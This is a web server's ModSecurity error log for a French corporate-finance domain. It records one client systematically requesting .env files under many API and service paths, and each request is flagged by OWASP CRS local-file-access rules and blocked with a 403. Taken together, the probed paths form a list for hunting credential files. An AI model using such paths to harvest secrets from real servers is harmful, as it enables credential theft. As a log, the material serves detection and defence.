[Mon May 11 16:26:10.415226 2026] [core:error] [pid 1411099:tid 1411104] [client 18.180.54.2:60716] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:10.415389 2026] [security2:error] [pid 1411099:tid 1411104] [client 18.180.54.2:60716] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/graphql/.env"] [unique_id "agHnAg-Qm4vhlWBPlMi5-gAAAAM"]
[Mon May 11 16:26:10.730165 2026] [security2:error] [pid 1416109:tid 1416138] [client 18.180.54.2:60724] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /microservice/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/microservice/.env"] [unique_id "agHnAlV4kyjgo4bQBUhUMQAAAMg"]
[Mon May 11 16:26:10.730381 2026] [security2:error] [pid 1416109:tid 1416138] [client 18.180.54.2:60724] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/microservice/.env"] [unique_id "agHnAlV4kyjgo4bQBUhUMQAAAMg"]
[Mon May 11 16:26:10.730909 2026] [core:error] [pid 1416109:tid 1416138] [client 18.180.54.2:60724] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:10.731063 2026] [security2:error] [pid 1416109:tid 1416138] [client 18.180.54.2:60724] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/microservice/.env"] [unique_id "agHnAlV4kyjgo4bQBUhUMQAAAMg"]
[Mon May 11 16:26:11.112670 2026] [security2:error] [pid 1411201:tid 1411251] [client 18.180.54.2:60728] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gateway/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/gateway/.env"] [unique_id "agHnA_y_GXSWIKeli0vyPQAAAIU"]
[Mon May 11 16:26:11.112890 2026] [security2:error] [pid 1411201:tid 1411251] [client 18.180.54.2:60728] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/gateway/.env"] [unique_id "agHnA_y_GXSWIKeli0vyPQAAAIU"]
[Mon May 11 16:26:11.113433 2026] [core:error] [pid 1411201:tid 1411251] [client 18.180.54.2:60728] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:11.113799 2026] [security2:error] [pid 1411201:tid 1411251] [client 18.180.54.2:60728] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/gateway/.env"] [unique_id "agHnA_y_GXSWIKeli0vyPQAAAIU"]
[Mon May 11 16:26:11.409131 2026] [security2:error] [pid 1411099:tid 1411108] [client 18.180.54.2:60742] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /service/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/service/.env"] [unique_id "agHnAw-Qm4vhlWBPlMi5_AAAAAc"]
[Mon May 11 16:26:11.409390 2026] [security2:error] [pid 1411099:tid 1411108] [client 18.180.54.2:60742] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/service/.env"] [unique_id "agHnAw-Qm4vhlWBPlMi5_AAAAAc"]
[Mon May 11 16:26:11.409867 2026] [core:error] [pid 1411099:tid 1411108] [client 18.180.54.2:60742] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:11.410023 2026] [security2:error] [pid 1411099:tid 1411108] [client 18.180.54.2:60742] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/service/.env"] [unique_id "agHnAw-Qm4vhlWBPlMi5_AAAAAc"]
[Mon May 11 16:26:11.836372 2026] [security2:error] [pid 1412074:tid 1412099] [client 18.180.54.2:60746] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /microservice/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/microservice/.env"] [unique_id "agHnAzJnyuKVXoStDha0mQAAAFc"]
[Mon May 11 16:26:11.836554 2026] [security2:error] [pid 1412074:tid 1412099] [client 18.180.54.2:60746] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/microservice/.env"] [unique_id "agHnAzJnyuKVXoStDha0mQAAAFc"]
[Mon May 11 16:26:11.837047 2026] [core:error] [pid 1412074:tid 1412099] [client 18.180.54.2:60746] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:11.837215 2026] [security2:error] [pid 1412074:tid 1412099] [client 18.180.54.2:60746] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/microservice/.env"] [unique_id "agHnAzJnyuKVXoStDha0mQAAAFc"]
[Mon May 11 16:26:12.134065 2026] [security2:error] [pid 1416109:tid 1416139] [client 18.180.54.2:60754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v3/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/api/v3/.env"] [unique_id "agHnBFV4kyjgo4bQBUhUNAAAAMk"]
[Mon May 11 16:26:12.134324 2026] [security2:error] [pid 1416109:tid 1416139] [client 18.180.54.2:60754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/api/v3/.env"] [unique_id "agHnBFV4kyjgo4bQBUhUNAAAAMk"]
[Mon May 11 16:26:12.134809 2026] [core:error] [pid 1416109:tid 1416139] [client 18.180.54.2:60754] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:12.134962 2026] [security2:error] [pid 1416109:tid 1416139] [client 18.180.54.2:60754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/api/v3/.env"] [unique_id "agHnBFV4kyjgo4bQBUhUNAAAAMk"]
[Mon May 11 16:26:12.571624 2026] [security2:error] [pid 1411099:tid 1411105] [client 18.180.54.2:60764] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /service/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/service/.env"] [unique_id "agHnBA-Qm4vhlWBPlMi5_QAAAAQ"]
[Mon May 11 16:26:12.571849 2026] [security2:error] [pid 1411099:tid 1411105] [client 18.180.54.2:60764] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/service/.env"] [unique_id "agHnBA-Qm4vhlWBPlMi5_QAAAAQ"]
[Mon May 11 16:26:12.572378 2026] [core:error] [pid 1411099:tid 1411105] [client 18.180.54.2:60764] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:12.572528 2026] [security2:error] [pid 1411099:tid 1411105] [client 18.180.54.2:60764] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/service/.env"] [unique_id "agHnBA-Qm4vhlWBPlMi5_QAAAAQ"]
[Mon May 11 16:26:12.843518 2026] [security2:error] [pid 1411201:tid 1411260] [client 18.180.54.2:60776] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/api/dev/.env"] [unique_id "agHnBPy_GXSWIKeli0vyQAAAAI4"]
[Mon May 11 16:26:12.843714 2026] [security2:error] [pid 1411201:tid 1411260] [client 18.180.54.2:60776] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/api/dev/.env"] [unique_id "agHnBPy_GXSWIKeli0vyQAAAAI4"]
[Mon May 11 16:26:12.844200 2026] [core:error] [pid 1411201:tid 1411260] [client 18.180.54.2:60776] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:12.844342 2026] [security2:error] [pid 1411201:tid 1411260] [client 18.180.54.2:60776] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/api/dev/.env"] [unique_id "agHnBPy_GXSWIKeli0vyQAAAAI4"]
[Mon May 11 16:26:13.311949 2026] [security2:error] [pid 1411201:tid 1411424] [client 18.180.54.2:60778] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v3/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/api/v3/.env"] [unique_id "agHnBfy_GXSWIKeli0vyQgAAAJM"]
[Mon May 11 16:26:13.312200 2026] [security2:error] [pid 1411201:tid 1411424] [client 18.180.54.2:60778] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/api/v3/.env"] [unique_id "agHnBfy_GXSWIKeli0vyQgAAAJM"]
[Mon May 11 16:26:13.316004 2026] [core:error] [pid 1411201:tid 1411424] [client 18.180.54.2:60778] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:13.316149 2026] [security2:error] [pid 1411201:tid 1411424] [client 18.180.54.2:60778] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/api/v3/.env"] [unique_id "agHnBfy_GXSWIKeli0vyQgAAAJM"]
[Mon May 11 16:26:13.540143 2026] [security2:error] [pid 1412074:tid 1412085] [client 18.180.54.2:60786] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/api/staging/.env"] [unique_id "agHnBTJnyuKVXoStDha0nwAAAEk"]
[Mon May 11 16:26:13.540399 2026] [security2:error] [pid 1412074:tid 1412085] [client 18.180.54.2:60786] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/api/staging/.env"] [unique_id "agHnBTJnyuKVXoStDha0nwAAAEk"]
[Mon May 11 16:26:13.540918 2026] [core:error] [pid 1412074:tid 1412085] [client 18.180.54.2:60786] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:13.541077 2026] [security2:error] [pid 1412074:tid 1412085] [client 18.180.54.2:60786] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/api/staging/.env"] [unique_id "agHnBTJnyuKVXoStDha0nwAAAEk"]
[Mon May 11 16:26:14.014755 2026] [security2:error] [pid 1411099:tid 1411122] [client 18.180.54.2:60796] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/api/dev/.env"] [unique_id "agHnBg-Qm4vhlWBPlMi6BAAAABY"]
[Mon May 11 16:26:14.014981 2026] [security2:error] [pid 1411099:tid 1411122] [client 18.180.54.2:60796] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/api/dev/.env"] [unique_id "agHnBg-Qm4vhlWBPlMi6BAAAABY"]
[Mon May 11 16:26:14.015496 2026] [core:error] [pid 1411099:tid 1411122] [client 18.180.54.2:60796] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:14.015647 2026] [security2:error] [pid 1411099:tid 1411122] [client 18.180.54.2:60796] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/api/dev/.env"] [unique_id "agHnBg-Qm4vhlWBPlMi6BAAAABY"]
[Mon May 11 16:26:14.273031 2026] [security2:error] [pid 1411201:tid 1411246] [client 18.180.54.2:60812] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/vendor/.env"] [unique_id "agHnBvy_GXSWIKeli0vyQwAAAIA"]
[Mon May 11 16:26:14.273295 2026] [security2:error] [pid 1411201:tid 1411246] [client 18.180.54.2:60812] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/vendor/.env"] [unique_id "agHnBvy_GXSWIKeli0vyQwAAAIA"]
[Mon May 11 16:26:14.273768 2026] [core:error] [pid 1411201:tid 1411246] [client 18.180.54.2:60812] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:14.274238 2026] [security2:error] [pid 1411201:tid 1411246] [client 18.180.54.2:60812] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/vendor/.env"] [unique_id "agHnBvy_GXSWIKeli0vyQwAAAIA"]
[Mon May 11 16:26:14.736874 2026] [security2:error] [pid 1412074:tid 1412090] [client 18.180.54.2:60820] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/api/staging/.env"] [unique_id "agHnBjJnyuKVXoStDha0oAAAAE4"]
